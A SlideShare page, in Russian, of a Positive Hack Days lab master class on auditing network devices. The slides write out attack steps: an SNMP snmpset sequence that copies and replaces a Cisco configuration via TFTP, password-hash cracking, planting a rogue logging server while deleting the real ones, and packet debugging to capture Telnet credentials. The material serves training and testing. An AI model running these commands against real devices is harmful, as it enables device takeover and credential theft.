SlideShare a Scribd company logo
Мастер-класс по теме  «Анализ защищенности сетевой инфраструктуры» Павлов Сергей Positive  Technologies
Введение в тему безопасности сетевой инфраструктуры
План лабораторной работы   Сканирование Стандартные пароли  SNMP Учетные записи управления через Telnet и SSH Стандартные значения сетевых устройств Регистрация событий. VPN Резюме
Часть 1. Сканирование Сканирование - всегда первый шаг, используемый злоумышленниками для получения списка доступных сервисов Полученная информация может быть использована для: Попытки подбора учетных записей и паролей Определений версий сервисов
Практическое занятие (1) Загрузить виртуальную машину Просканировать определенный порт сетевого устройства с помощью ПО  nmap.
Часть 2 :  Стандартные пароли  SNMP
SNMPv1/2 Права в  SNMP Read-only -  Режим используется только для мониторинга устройства без прав на управление . Read-write -  мониторинг и управление устройством . Пример подбора строк подключения для  SNMP  с помощью утилиты  SNSCAN  от  McAfee :
Копирование файла конфигурации через  SNMP TFTP- сервер snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.2.666 integer 1 snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.3.666 integer 4 snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.4.666 integer 1 snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.5.666 address < адрес  TFTP- сервера>. snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.6.666 string victim-config snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.14.666 integer 1 / //Возврат модифицированного файла конфигурации ( starup-config)  // обратно на устройство snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.2.670 integer 1 snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.3.670 integer 1 snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.4.670 integer 3 snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.5.670 address < адрес  TFTP- сервера>. snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.6.670 string victim-config snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.14.670 integer 1 // Перезагрузка устройства для применения изменений
Практическое занятие ( 2 ) Включить  TFTP- сервер Подобрать пароль на  SNMP Скопировать файл конфигурации на  TFTP- сервер
Часть 3. Учетные записи управления через  Telnet  и  SSH
Типы привилегий Стандартные привилегии На устройстве предоставляются ограниченные привилегии (уровень 1) на выполнение ограниченного набора команд. Повышенные  привилегии Для повышения привилегий на  Cisco  требуется знать пароль « enable » (уровень 15)
Типы паролей пользователей Без шифрования username cisco password  0   cisco Слабое шифрование username admin password 7 104F0D140C1953 Существует множество утилит для восстановления. Например:  Cain&Abel . Время восстановления: доли секунд. Хеширование пароля enable secret 5 $1$1lSz$k.iGUgWvgxm27iJ/vaBfK0 Пароль восстанавливает только методом перебора. Для восстановления можно использовать ПО:  Cain&Abel ,  PasswordPro,  John the Ripper  и т.п. Время восстановления: не предсказуемо.
Практическое занятие (3) Восстановить пароль пользователя  “admin” Восстановить пароль  enable
Часть 4. Стандартные значения сетевых устройств.
Примеры Зачастую на сетевых устройствах присутствуют стандартные значения, т.е. мы их не видим в конфигурации, а они есть  ;) При включении  aaa new-model,  применяются значения: aaa authentication login default local –  для  vty aaa authentication login default none –  для  con HTTP  сервер не зависит от службы  “aaa”  и по умолчанию используется пароль  “enable”
Практическое занятие (4) Набрать при входе на устройство через  telnet  вместо учетной записи  “admin” “AdMIn” Зайти через  HTTP  на устройство ,  используя только пароль  enable . Завести нового пользователя через веб-интерфейс Проверить, что новый пользователь может зайти через  telnet
Часть 5. Регистрация событий. ДОБРО или ЗЛО?
Регистрация событий помогает: Искать неисправности в сети Обнаруживать попытки НСД Контролировать изменения конфигураций, устройств НО !  Регистрация событий может играть и негативную роль: При добавлении нового сервера регистрации в конфигурацию, злоумышленник получает те же данные, что и администратор сети Служба регистрации позволяет перехватить учетные записи и пароли пользователей   в проходящем через устройство трафике Функции регистрации событий
Добавление нового сервера регистрации событий  Добавление нового сервера MC#conf t MC(config)#logging 192.168.123.4 Удаление остальных…. Чтобы не мешали работать  ;) MC#conf t MC(config)#no logging 1.2.3.4
Перехватить трафик нельзя?!  А если очень хочется? … То можно MC#conf t MC(config)#logging trap 7 MC(config)#access-list 122 permit tcp any any eq telnet MC(config)#end MC#debug ip packet 122 detail dump Получение новых событий конечно интересно, но ведь интересен и трафик, «проходящий» через устройство, особенно который не шифруется. Для этого можно воспользоваться не декларированными возможностями  Cisco IOS.
Практическое занятие (5) Включить сервер регистрации Добавить новый сервер регистрации событий на сетевом устройстве Регистрация трафика службы  Telnet
Часть 6 .   VPN
Зачем нужен  VPN ? Без  VPN  доступ из общей сети возможен только к пограничным устройствам Через  VPN  возможен доступ к службам, которые обычно «зарезают» провайдеры. Например: 445 /tcp. Сетевые устройства не поддерживают все популярные сервисы. Например: с сетевого устройства нельзя запустить  RDP- сессию.
Типы  VPN GRE  — протокол туннелирования сетевых пакетов без шифрования. Основное назначение — инкапсуляция пакетов сетевого уровня в IP пакеты .   L2TP  - туннельный протокол, не обеспечивает шифрование и конфиденциальность. Опирается на инкапсулируемый протокол для обеспечения конфиденциальности. PPTP  - туннельный протокол типа точка-точка. Создает с сервером туннель для обмена данными. IPSEC  - позволяет осуществлять подтверждение подлинности и/или шифрование IP-пакетов.
Пример настройки  PPTP aaa new-model aaa authentication ppp default local vpdn enable ! vpdn-group 1 ! Default PPTP VPDN group accept-dialin protocol pptp virtual-template 1 local name tunnel ! interface Virtual-Template1 ip unnumbered FastEthernet0/1 ip mroute-cache peer default ip address pool default ppp encrypt mppe auto ppp authentication ms-chap ! ip local pool default  1.1.1.10   1.1.1.100
Практическое занятие (6) Настроить  PPTP,  подключиться к устройству Проверить доступность узла  1.1.1. 1
Резюме лабораторной работы
Резюме Нельзя оставлять без внимания сетевые устройства. Поскольку при их «захвате» злоумышленник может манипулировать всей сетью Компании  Использовать при настройки сетевых устройств « best practice »   по безопасности Защита  сетевых устройств  должна быть комплексной Постоянно контролировать защищенность сети
Дополнительные материалы и ссылки Сканирование  SNMPv1/2 SNSCAN Hydra Копирование конфигурации через  SNMP   Настройка  PPTP   Дистрибутив  BackTrack
Спасибо за внимание! [email_address]

More Related Content

PPTX
Get inside stage2 new
PPTX
QA Fest 2018. Святослав Логин. Что такое Metasploit? Как его использовать для...
PDF
Тандемные DDoS-атаки. Проблематика уязвимостей в спецификации TCP IP (фундаме...
ODP
MUM Построение сети доступа на основе технологий DHCP + Radius на Mikrotik
PDF
Александр Тоболь, Кадры решают все, или стриминг видео в Одноклассниках
PDF
Пишем свой протокол поверх UDP или платформа потокового видео с нуля на милли...
PDF
СВЯТ ЛОГИН «Як провести penetration testing c metasploit framework» QADay 2019
Get inside stage2 new
QA Fest 2018. Святослав Логин. Что такое Metasploit? Как его использовать для...
Тандемные DDoS-атаки. Проблематика уязвимостей в спецификации TCP IP (фундаме...
MUM Построение сети доступа на основе технологий DHCP + Radius на Mikrotik
Александр Тоболь, Кадры решают все, или стриминг видео в Одноклассниках
Пишем свой протокол поверх UDP или платформа потокового видео с нуля на милли...
СВЯТ ЛОГИН «Як провести penetration testing c metasploit framework» QADay 2019

What's hot (17)

PPTX
Продвинутая web-отладка с Fiddler
PDF
Оптимизации поисковой выдачи Яндекса / Иван Хватов, Сергей Ляджин (Яндекс)
PPTX
iRidium для AV & Custom Systems и Global Caché
PDF
Борьба с DDoS в хостинге - по обе стороны баррикад / Константин Новаковский (...
PPTX
Уязвимости сервисов
PDF
Bykov monitoring mailru
PPTX
Fiddler
PDF
ащита удаленного доступа с помощью континент Tls vpn
PDF
мои модули и патчи для Nginx. максим дунин. зал 1
PDF
Обзор новых функций Континент TLS VPN 1.0.9
PPTX
Cпецкурс 2014, занятие 7. Web-приложения
PDF
Антон Карпов - Сетевая безопасность
PDF
Кадры решают все, или стриминг видео в «Одноклассниках». Александр Тоболь
PDF
RootConf 2015
PDF
HighLoad++ 2019: iptables + consul = :3
PDF
Networking technology in modern Virtual Private Clouds (RUS, RootConf++ 2018)
PDF
Networks in the cloud on OpenStask: problems we face and their solution
Продвинутая web-отладка с Fiddler
Оптимизации поисковой выдачи Яндекса / Иван Хватов, Сергей Ляджин (Яндекс)
iRidium для AV & Custom Systems и Global Caché
Борьба с DDoS в хостинге - по обе стороны баррикад / Константин Новаковский (...
Уязвимости сервисов
Bykov monitoring mailru
Fiddler
ащита удаленного доступа с помощью континент Tls vpn
мои модули и патчи для Nginx. максим дунин. зал 1
Обзор новых функций Континент TLS VPN 1.0.9
Cпецкурс 2014, занятие 7. Web-приложения
Антон Карпов - Сетевая безопасность
Кадры решают все, или стриминг видео в «Одноклассниках». Александр Тоболь
RootConf 2015
HighLoad++ 2019: iptables + consul = :3
Networking technology in modern Virtual Private Clouds (RUS, RootConf++ 2018)
Networks in the cloud on OpenStask: problems we face and their solution

Viewers also liked (18)

PPTX
Высоконагруженный сервис (Николай Кондратов, Дмитрий Чернышев)
PPTX
Модель организационной зрелости проектного управления PMI® OPM3®
PPTX
Презентация проекта "Kerio Workspace - инструмент совместной работы"
PPTX
Презентация проекта "Виртуальное частное облако инструмент снижения TCO"
PDF
Управление аутсорсингом поддержки бизнес- приложений
PPTX
Повышение эффективности вложений в эксплуатацию инф.систем
PDF
Мордвинков (Itelligence) "Трезвый водитель для SAP"
PDF
IBM FlashSystem-Бескомпромиссность в каждом байте
PDF
Максим Ликсутов. Сеcсия: «Общественный транспорт – фокус на пользователя»
PDF
Централизация казначейства – первый шаг на пути к полнофункциональной системе...
PDF
Введение в ITSM (ITIL v.3)
PDF
Разработка ИТ-стратегии для ОАО «РСК "МиГ"»
PPTX
Решения для разумной оптимизации ИТ-инфраструктуры. Сокращение ваших расходов...
PDF
Формализация и документирование процессов
PPTX
Постановка системы контроля на предприятии. Управление по результатам
PPTX
Партизанский маркетинг услуг
PPTX
Система управления
PPTX
Overview Sap Outsourcing Services En 2012
Высоконагруженный сервис (Николай Кондратов, Дмитрий Чернышев)
Модель организационной зрелости проектного управления PMI® OPM3®
Презентация проекта "Kerio Workspace - инструмент совместной работы"
Презентация проекта "Виртуальное частное облако инструмент снижения TCO"
Управление аутсорсингом поддержки бизнес- приложений
Повышение эффективности вложений в эксплуатацию инф.систем
Мордвинков (Itelligence) "Трезвый водитель для SAP"
IBM FlashSystem-Бескомпромиссность в каждом байте
Максим Ликсутов. Сеcсия: «Общественный транспорт – фокус на пользователя»
Централизация казначейства – первый шаг на пути к полнофункциональной системе...
Введение в ITSM (ITIL v.3)
Разработка ИТ-стратегии для ОАО «РСК "МиГ"»
Решения для разумной оптимизации ИТ-инфраструктуры. Сокращение ваших расходов...
Формализация и документирование процессов
Постановка системы контроля на предприятии. Управление по результатам
Партизанский маркетинг услуг
Система управления
Overview Sap Outsourcing Services En 2012

Similar to Positive Hack Days. Павлов. Мастер-класс: Анализ защищенности сетевой инфраструктуры (20)

PDF
Автономные Сети: упрощение развертывания уровня доступа в сети сервис-провайдера
PDF
Программируемость коммутаторов для ЦОД Cisco Nexus
PDF
еще один недостаток современных клиент серверных приложений
PDF
Другая виртуализация
DOCX
пр 9 10.docx
PDF
Кулинарный мастер-класс "Готовим безопасный офис нового поколения на основе C...
PDF
Новая Cisco ASA: тотальный контроль над пользователем
PDF
Пакетное ядро мобильного оператора: ASR5k, поиски устранение неисправностей
PDF
Сетевой инженер 2.0. Что нужно знать о программируемости в корпоративной сети?
PDF
Визуализация взломов в собственной сети PAN
PPTX
Как правильно подключать сотрудников из дома через VPN шлюз на Palo Alto Netw...
PDF
Автоматизация задач с помощью EEM
PDF
NeoQUEST: Tpm.txt.на что способно заморское железо
PDF
Building deployment pipeline - DevOps way
PPT
Отказоустойчивый микрокластер своими руками, Виталий Гаврилов (Ленвендо)
PDF
Методики и инструменты для самостоятельного решения проблем в сети
PDF
Application Security - ответы на ежедневные вопросы / Сергей Белов (Mail.Ru G...
PPTX
Смотрим в HTTPS
PPTX
Сетевая безопасность в 2014: новые проблемы и их решение на базе Cisco
PDF
ITSF 2014 ICS Security
Автономные Сети: упрощение развертывания уровня доступа в сети сервис-провайдера
Программируемость коммутаторов для ЦОД Cisco Nexus
еще один недостаток современных клиент серверных приложений
Другая виртуализация
пр 9 10.docx
Кулинарный мастер-класс "Готовим безопасный офис нового поколения на основе C...
Новая Cisco ASA: тотальный контроль над пользователем
Пакетное ядро мобильного оператора: ASR5k, поиски устранение неисправностей
Сетевой инженер 2.0. Что нужно знать о программируемости в корпоративной сети?
Визуализация взломов в собственной сети PAN
Как правильно подключать сотрудников из дома через VPN шлюз на Palo Alto Netw...
Автоматизация задач с помощью EEM
NeoQUEST: Tpm.txt.на что способно заморское железо
Building deployment pipeline - DevOps way
Отказоустойчивый микрокластер своими руками, Виталий Гаврилов (Ленвендо)
Методики и инструменты для самостоятельного решения проблем в сети
Application Security - ответы на ежедневные вопросы / Сергей Белов (Mail.Ru G...
Смотрим в HTTPS
Сетевая безопасность в 2014: новые проблемы и их решение на базе Cisco
ITSF 2014 ICS Security

More from Positive Hack Days (20)

PPTX
Инструмент ChangelogBuilder для автоматической подготовки Release Notes
PPTX
Как мы собираем проекты в выделенном окружении в Windows Docker
PPTX
Типовая сборка и деплой продуктов в Positive Technologies
PPTX
Аналитика в проектах: TFS + Qlik
PPTX
Использование анализатора кода SonarQube
PPTX
Развитие сообщества Open DevOps Community
PPTX
Методика определения неиспользуемых ресурсов виртуальных машин и автоматизаци...
PPTX
Автоматизация построения правил для Approof
PDF
Мастер-класс «Трущобы Application Security»
PDF
Формальные методы защиты приложений
PDF
Эвристические методы защиты приложений
PDF
Теоретические основы Application Security
PPTX
От экспериментального программирования к промышленному: путь длиной в 10 лет
PDF
Уязвимое Android-приложение: N проверенных способов наступить на грабли
PPTX
Требования по безопасности в архитектуре ПО
PDF
Формальная верификация кода на языке Си
PPTX
Механизмы предотвращения атак в ASP.NET Core
PDF
SOC для КИИ: израильский опыт
PDF
Honeywell Industrial Cyber Security Lab & Services Center
PDF
Credential stuffing и брутфорс-атаки
Инструмент ChangelogBuilder для автоматической подготовки Release Notes
Как мы собираем проекты в выделенном окружении в Windows Docker
Типовая сборка и деплой продуктов в Positive Technologies
Аналитика в проектах: TFS + Qlik
Использование анализатора кода SonarQube
Развитие сообщества Open DevOps Community
Методика определения неиспользуемых ресурсов виртуальных машин и автоматизаци...
Автоматизация построения правил для Approof
Мастер-класс «Трущобы Application Security»
Формальные методы защиты приложений
Эвристические методы защиты приложений
Теоретические основы Application Security
От экспериментального программирования к промышленному: путь длиной в 10 лет
Уязвимое Android-приложение: N проверенных способов наступить на грабли
Требования по безопасности в архитектуре ПО
Формальная верификация кода на языке Си
Механизмы предотвращения атак в ASP.NET Core
SOC для КИИ: израильский опыт
Honeywell Industrial Cyber Security Lab & Services Center
Credential stuffing и брутфорс-атаки

Positive Hack Days. Павлов. Мастер-класс: Анализ защищенности сетевой инфраструктуры

  • 1. Мастер-класс по теме «Анализ защищенности сетевой инфраструктуры» Павлов Сергей Positive Technologies
  • 2. Введение в тему безопасности сетевой инфраструктуры
  • 3. План лабораторной работы Сканирование Стандартные пароли SNMP Учетные записи управления через Telnet и SSH Стандартные значения сетевых устройств Регистрация событий. VPN Резюме
  • 4. Часть 1. Сканирование Сканирование - всегда первый шаг, используемый злоумышленниками для получения списка доступных сервисов Полученная информация может быть использована для: Попытки подбора учетных записей и паролей Определений версий сервисов
  • 5. Практическое занятие (1) Загрузить виртуальную машину Просканировать определенный порт сетевого устройства с помощью ПО nmap.
  • 6. Часть 2 : Стандартные пароли SNMP
  • 7. SNMPv1/2 Права в SNMP Read-only - Режим используется только для мониторинга устройства без прав на управление . Read-write - мониторинг и управление устройством . Пример подбора строк подключения для SNMP с помощью утилиты SNSCAN от McAfee :
  • 8. Копирование файла конфигурации через SNMP TFTP- сервер snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.2.666 integer 1 snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.3.666 integer 4 snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.4.666 integer 1 snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.5.666 address < адрес TFTP- сервера>. snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.6.666 string victim-config snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.14.666 integer 1 / //Возврат модифицированного файла конфигурации ( starup-config) // обратно на устройство snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.2.670 integer 1 snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.3.670 integer 1 snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.4.670 integer 3 snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.5.670 address < адрес TFTP- сервера>. snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.6.670 string victim-config snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.14.670 integer 1 // Перезагрузка устройства для применения изменений
  • 9. Практическое занятие ( 2 ) Включить TFTP- сервер Подобрать пароль на SNMP Скопировать файл конфигурации на TFTP- сервер
  • 10. Часть 3. Учетные записи управления через Telnet и SSH
  • 11. Типы привилегий Стандартные привилегии На устройстве предоставляются ограниченные привилегии (уровень 1) на выполнение ограниченного набора команд. Повышенные привилегии Для повышения привилегий на Cisco требуется знать пароль « enable » (уровень 15)
  • 12. Типы паролей пользователей Без шифрования username cisco password 0 cisco Слабое шифрование username admin password 7 104F0D140C1953 Существует множество утилит для восстановления. Например: Cain&Abel . Время восстановления: доли секунд. Хеширование пароля enable secret 5 $1$1lSz$k.iGUgWvgxm27iJ/vaBfK0 Пароль восстанавливает только методом перебора. Для восстановления можно использовать ПО: Cain&Abel , PasswordPro, John the Ripper и т.п. Время восстановления: не предсказуемо.
  • 13. Практическое занятие (3) Восстановить пароль пользователя “admin” Восстановить пароль enable
  • 14. Часть 4. Стандартные значения сетевых устройств.
  • 15. Примеры Зачастую на сетевых устройствах присутствуют стандартные значения, т.е. мы их не видим в конфигурации, а они есть ;) При включении aaa new-model, применяются значения: aaa authentication login default local – для vty aaa authentication login default none – для con HTTP сервер не зависит от службы “aaa” и по умолчанию используется пароль “enable”
  • 16. Практическое занятие (4) Набрать при входе на устройство через telnet вместо учетной записи “admin” “AdMIn” Зайти через HTTP на устройство , используя только пароль enable . Завести нового пользователя через веб-интерфейс Проверить, что новый пользователь может зайти через telnet
  • 17. Часть 5. Регистрация событий. ДОБРО или ЗЛО?
  • 18. Регистрация событий помогает: Искать неисправности в сети Обнаруживать попытки НСД Контролировать изменения конфигураций, устройств НО ! Регистрация событий может играть и негативную роль: При добавлении нового сервера регистрации в конфигурацию, злоумышленник получает те же данные, что и администратор сети Служба регистрации позволяет перехватить учетные записи и пароли пользователей в проходящем через устройство трафике Функции регистрации событий
  • 19. Добавление нового сервера регистрации событий Добавление нового сервера MC#conf t MC(config)#logging 192.168.123.4 Удаление остальных…. Чтобы не мешали работать ;) MC#conf t MC(config)#no logging 1.2.3.4
  • 20. Перехватить трафик нельзя?! А если очень хочется? … То можно MC#conf t MC(config)#logging trap 7 MC(config)#access-list 122 permit tcp any any eq telnet MC(config)#end MC#debug ip packet 122 detail dump Получение новых событий конечно интересно, но ведь интересен и трафик, «проходящий» через устройство, особенно который не шифруется. Для этого можно воспользоваться не декларированными возможностями Cisco IOS.
  • 21. Практическое занятие (5) Включить сервер регистрации Добавить новый сервер регистрации событий на сетевом устройстве Регистрация трафика службы Telnet
  • 23. Зачем нужен VPN ? Без VPN доступ из общей сети возможен только к пограничным устройствам Через VPN возможен доступ к службам, которые обычно «зарезают» провайдеры. Например: 445 /tcp. Сетевые устройства не поддерживают все популярные сервисы. Например: с сетевого устройства нельзя запустить RDP- сессию.
  • 24. Типы VPN GRE — протокол туннелирования сетевых пакетов без шифрования. Основное назначение — инкапсуляция пакетов сетевого уровня в IP пакеты . L2TP - туннельный протокол, не обеспечивает шифрование и конфиденциальность. Опирается на инкапсулируемый протокол для обеспечения конфиденциальности. PPTP - туннельный протокол типа точка-точка. Создает с сервером туннель для обмена данными. IPSEC - позволяет осуществлять подтверждение подлинности и/или шифрование IP-пакетов.
  • 25. Пример настройки PPTP aaa new-model aaa authentication ppp default local vpdn enable ! vpdn-group 1 ! Default PPTP VPDN group accept-dialin protocol pptp virtual-template 1 local name tunnel ! interface Virtual-Template1 ip unnumbered FastEthernet0/1 ip mroute-cache peer default ip address pool default ppp encrypt mppe auto ppp authentication ms-chap ! ip local pool default 1.1.1.10 1.1.1.100
  • 26. Практическое занятие (6) Настроить PPTP, подключиться к устройству Проверить доступность узла 1.1.1. 1
  • 28. Резюме Нельзя оставлять без внимания сетевые устройства. Поскольку при их «захвате» злоумышленник может манипулировать всей сетью Компании Использовать при настройки сетевых устройств « best practice » по безопасности Защита сетевых устройств должна быть комплексной Постоянно контролировать защищенность сети
  • 29. Дополнительные материалы и ссылки Сканирование SNMPv1/2 SNSCAN Hydra Копирование конфигурации через SNMP Настройка PPTP Дистрибутив BackTrack